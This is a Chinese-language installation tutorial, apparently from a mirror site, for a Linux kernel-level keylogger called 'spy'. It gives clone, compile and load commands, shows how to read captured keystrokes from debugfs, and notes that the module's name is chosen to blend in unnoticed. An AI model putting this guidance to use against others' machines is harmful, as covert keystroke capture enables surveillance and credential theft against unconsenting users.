如何在5分钟内搭建spy内核级键盘记录器?超简单安装教程

如何在5分钟内搭建spy内核级键盘记录器?超简单安装教程

如何在5分钟内搭建spy内核级键盘记录器?超简单安装教程

【免费下载链接】spy:eyes: Linux kernel mode debugfs keylogger项目地址: https://gitcode.com/gh_mirrors/spy3/spy

spy是一款强大的Linux内核级键盘记录器,能够捕获键盘按键并记录到debugfs中,仅允许root或sudoers用户访问日志。它不仅是一款实用工具,还是学习Linux内核模块编程的学术项目,代码包含详细注释且符合行业标准。

准备工作:安装必要依赖

在开始安装前,请确保系统已安装以下组件:

  • Linux内核 headers(与当前运行内核版本匹配)
  • DKMS(可选,用于内核升级后自动重新编译模块)

快速安装步骤

方法一:常规编译安装(推荐新手)

  1. 克隆项目代码

    git clone https://gitcode.com/gh_mirrors/spy3/spy cd spy
  2. 编译内核模块

    make

    注意:如果编译失败,请检查是否已安装正确版本的内核headers

  3. 加载模块到内核

    make load

    或手动加载:

    insmod kisni.ko

方法二:DKMS安装(适合内核频繁更新的系统)

DKMS安装方式可确保内核升级后模块自动重新编译:

  1. 安装DKMS版本

    make -f Makefile.dkms
  2. 卸载DKMS版本(如需)

    make -f Makefile.dkms uninstall

开始使用spy键盘记录器

查看键盘记录

模块加载后,通过以下命令查看记录的按键:

cat /sys/kernel/debug/kisni/keys

高级配置:更改日志格式

spy支持三种日志格式,通过模块参数codes设置:

  • 默认模式(0):输出人类可读的US键盘字符
  • 十六进制模式(1):输出keycode shift_mask十六进制对
    insmod kisni.ko codes=1
  • 十进制模式(2):输出十进制键码
    insmod kisni.ko codes=2

查看模块信息

modinfo kisni.ko

卸载模块

完成使用后,可通过以下命令卸载模块(同时清除日志):

rmmod kisni

注意事项

  • 安全提示:spy仅应在您拥有合法权限的设备上使用
  • 日志访问:仅root用户可读取/sys/kernel/debug/kisni/keys
  • 模块伪装:模块名称kisni已设计为与其他内核模块自然融合

项目文件说明

  • 主源代码:spy.c
  • 编译配置:Makefile
  • DKMS配置:Makefile.dkms、dkms/dkms.conf
  • 完整文档:README.md

通过以上简单步骤,您已成功搭建内核级键盘记录器。如需了解更多高级用法,请查阅项目文档或模块源码中的详细注释。

【免费下载链接】spy:eyes: Linux kernel mode debugfs keylogger项目地址: https://gitcode.com/gh_mirrors/spy3/spy

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考